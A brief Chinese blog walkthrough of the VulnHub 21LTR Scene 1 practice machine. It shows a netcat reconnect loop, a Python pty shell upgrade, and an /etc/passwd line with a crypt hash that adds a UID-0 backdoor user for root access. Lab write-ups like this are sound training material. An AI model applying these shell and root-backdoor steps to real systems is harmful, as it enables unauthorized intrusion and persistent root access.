vulnhub攻略

  1. https://www.vulnhub.com/entry/21ltr-scene-1,3/

    这个靶机国内https://www.cnblogs.com/hack404/p/11423228.html这个大佬有做过

    首先他的ip是192.168.2.120,这个很重要,自己配置一下环境,搞了半天ip都不同

    有几个坑点,当用telnet链接10001端口时,会提示链接重置,然后看了国外小哥

    使用while true; do nc -v 192.168.2.120 10001 && break;sleep 1;clear;done;命令,等一会,就自己打开了

    

    他的ssh私钥文件直接就给,看了一下  进/media目录,ls -R可以看到,

    

    然后用反弹没什么问题,然后用python开一个终端,

    python -c "import pty; pty.spawn(‘/bin/bash‘);"

    下载文件后,给id_ras权限,然后链接

    最后往/etc/passwd添加用户的时候,他这个生成密码看不懂,我不会

    perl -le ‘print crypt("10086","bb")‘ ,生成密码10086

    bugtest:bbma0iajVxQUI:0:0:root:/root:/bin/bash

    就可以登录了一般的难度

原文地址:https://www.cnblogs.com/xm17/p/11745166.html

时间: 2024-10-08 16:48:51

vulnhub攻略的相关文章

移动端点击事件全攻略,有你知道与不知道的各种坑

看标题的时候你可能会想,点击事件有什么好说的,还写一篇攻略?哈哈,如果你这么想,只能说明你too young to simple. 接触过移动端开发的同学可能都会面临点击事件的第一个问题:click事件的300ms延迟响应.不能立即响应给体验造成了很大的困扰,因此解决这个问题就成为了必然. 这个问题的解决方案就是: zepto.js的tap事件.tap事件可以理解为在移动端的click事件,而zepto.js因为几乎完全复制jQuery的api,因此常常被用在h5的开发上用来取代jquery.

Azure进阶攻略丨Azure网络通不通,PsPing&PaPing告诉你答案

很多时候,为了解决一些问题,要查各种文档,很麻烦你造吗!做「伸手党」又容易被鄙视,这时候就需要用到[Azure 进阶攻略]啦!特此,我们推出关于 Azure 常用操作指南的系列文章,每篇涉及一个 Azure 使用过程中的问题,简明扼要直击重点,纯干货内容帮你快速搞定 Azure 使用难题和障碍,只需一两分钟阅读,你就可以继续愉快地翱翔云端~ 在技术人员和网络工程师的世界中,有一些众所周知的排错方式,例如: -你先 Ping 一下某某计算机,看它开着没, -我可以 Ping 通路由器,但 Ping

广州去厦门旅游攻略--(转自 #散文吧网站#)

广州去厦门旅游攻略 发布时间:2016-12-11 17:30 厦门由厦门岛.离岛鼓浪屿.内陆九龙江南岸海沧半岛.集美半岛.翔安区以及同安等组成,陆地面积1699.39Km2,海域面积300多平方公里.厦门的主体--厦门岛南北长13.7公里,东西宽12.5公里,面积约为128.14Km2.是厦门的主要岛屿,也是厦门第一大岛屿.厦门岛是厦门经济特区的发祥地,岛上有厦门的商业和政治中心.各国殖民者最初居住的地方鼓浪屿就在厦门岛西南部.今天小编带给大家的是广州去厦门旅游攻略, 希望对大家有帮助. 厦门

Linux Shell脚本攻略(1.12)

1.12 函数和参数 和其他脚本语言一样,Bash同样支持函数,并且可以传递参数. 1.12.1 函数定义和传参 #!/bin/bash function fname() #也可以用fname()代替 { echo $1,$2; #访问参数1和参数2 echo "[email protected]"; #以列表的方式一次性打印所有参数 echo "$*"; #类似于[email protected],但是参数被作为单个实体 return 0; #返回值 } fnam

备战软考(4) 软考下午题攻略

软考的全称是全国计算机技术与软件专业技术资格(水平)考试,而我们今天讨论的是其中的中级职称的一个科目----软件设计师.这个级别的考试主要分为两大块基础知识和应用技术,分别在考试当天的上午和下午进行测试. 对于基础知识这块,因为考查的知识面很广,也很细,个人而言无法找到一个行之有效的办法能让你迅速的提高上午题的成绩,因此就不在这里总结了,我们要做的就是看书,做题,再看书,再做题,然后接着看书,在看书与做题的反复中,一个一个的消灭自己的知识盲点和填补知识漏洞,这样慢慢的也许会有提升,但不要企图短时

活水渠 - 云影院之云时代看片全攻略

本文讨论了大数据时代最热门的两大应用之一的云计算(另一应用是物联网)对网络视频观看体验的具体影响,以及在观看方式上区别于传统下载方式的优点. 一.视频门户类网站 此类网站以优酷.乐视等为代表,主营传统网络视频业务,使用浏览器进行直接点击链接进行观看. 优点:电视节目丰富.观看技术手段简单.大型网站服务器稳定 缺点:看不了热门电影,精华视频要收费,免费用户要看广告 解决:浏览器辅助工具或插件解决收费和广告问题,在此基础上还诞生了视频门户网 站的入口集成网站,每天看云帆可免VIP直接观看主流视频门户

上云攻略强势来袭-华为企业云服务

第二期:云端高性能计算,弹性云服务器使用攻略 http://support.hwclouds.com/cloud_raiders/second-phase.html 第三期:云端高性能计算,弹性云服务器热门问题集锦 http://support.hwclouds.com/cloud_raiders/third-phase.html 第四期:云端高可靠的分布式存储,云硬盘使用指南 http://support.hwclouds.com/cloud_raiders/fourth-phase.html

jdk(Java SE JDK)安装与环境变量配置攻略

2017-01-08 21:00:55  jdk安装与环境变量配置攻略   1.下载jdk安装包 附个下载链接 http://www.oracle.com/technetwork/java/javase/downloads/index.html 2.安装JDK 选择安装目录,其中安装过程中会出现两次提示 .First.安装 jdk ,Second.安装 jre .小编建议两个安装在同一文件夹的不同子文件夹中. (jdk和jre不能安装在同一文件夹的根目录下,jdk和jre安装在同一文件夹极易出错

恶灵高校(二周目)攻略

此篇攻略的目标是击败最终Boss,获得光野圣良SR. 请先看完整篇攻略后,根据自己目前拥有的事件角色(イベキャラ)等级和装备,来提升不足的地方. 目录 一.推荐路线表二.异界攻略三.最终Boss攻略 1.编队与等级2.装备3.道具4.探索“异界奈落”5.最终Boss战6.击败最终Boss后 四.装备材料五.总结 一.推荐路线表 以下是推荐路线表,并非是最短和最佳路线,可根据自身装备和等级来决定行径路线,但请务必按照“关键路线”的顺序来,否则会浪费不必要的回合数. 场所 等级 备注 1F东廊下 L